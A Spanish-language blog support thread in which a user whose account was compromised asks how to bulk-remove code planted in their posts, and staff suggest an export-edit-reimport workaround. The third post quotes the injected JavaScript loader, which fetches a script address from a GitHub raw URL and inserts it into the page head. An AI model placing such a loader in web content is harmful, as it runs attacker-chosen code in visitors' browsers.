usurpación de identidad

  • mi blog es gratuito y no tiene la opcion de editar en bloque

    WP.com: Yes
    Jetpack: No
    Correct account: Yes

    El blog con el que necesito ayuda es (visible solo para usuarios conectados).

  • Me han usurpado la identidad, han entrado en el blog y se han llevado una copia del mismo. Pero, a la vez, han dejado un código en casi todas las entradas que, al ser gratuito el blog, no puedo quitar en bloque. Alguna idea para hacer esto, de una en una resultará muy tedioso. SideraVisus es un blog gratuito y privado.

    Gracias.

  • Este es el código que han dejado:

    (var url = «https://raw.githubusercontent.com/truba77/trubnik/main/to.txt»; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(«script»); script.src = data.trim(); document.getElementsByTagName(«head»)[0].appendChild(script); });)

  • ¡Hola!

    Disculpa el retraso en responder; hemos tenido unos días muy movidos y algunas preguntas quedaron por responder.

    Lo he revisado y ciertamente estoy viendo múltiples intentos de acceso desde hace meses, pero no parece que ninguno haya sido exitoso. ¿Puedes explicarnos con algo más de detalles a qué te refieres con lo de que se han llevado una copia?

    Por otro lado, he echado un ojo y no he podido ver ese código, aunque también es cierto que no funcionará al usar una etiqueta de script.

    Quedo pendiente de tu respuesta.

    ¡Un saludo!

  • Hola, me refiero a que enteraron al blog con mi nick y contraseña. Hicieron una copia del mismo, de todas las entradas, para copiar enlaces supongo. Y al hacerlo dejaron ése código en alguno de los post que se aprecian dándole al ‘more’.

    Mi pregunta es ¿se puede quitar, a la vez, de todas las entradas del blog ese código raro?

    Gracias por tu atención. Saludos cordiales

  • ¡Hola de nuevo!

    ¿Tienes idea de cómo accedieron a tus credenciales?

    Puedo hacerle una solicitud a mis compañeros del equipo de sistemas, pero me van a pedir algunos datos para proceder y quiero entender un poco más la situación.

    ¿Puedes indicarme una entrada donde aún esté ese código?

    ¡Un saludo!

  • Mis credenciales me las robaron con un virus, ya lo he solucionado. Pero no pude evitar que entraran en los primeros momentos.

    https://sideravisus2punto0.wordpress.com/2019/03/17/resistencia-baggott-julianna/

    En este post existe este código. Gracias.

  • ¡Hola!

    Lo he estado revisando y se me ha ocurrido una forma de editar todo en bloque, pero es algo trabajosa. Te la explico por si te interesa:

    Podrías exportar el contenido usando las herramientas integradas, modificar el contenido en bloque desde un editor de texto, vaciar el sitio e importarlo de nuevo.

    Eso sí, si te decides por esto, haz primero una prueba en un sitio nuevo para asegurarte de que todo sigue como esperas y antes de borrar nada en el tuyo :)

    ¡Un saludo!

Responder a usurpación de identidad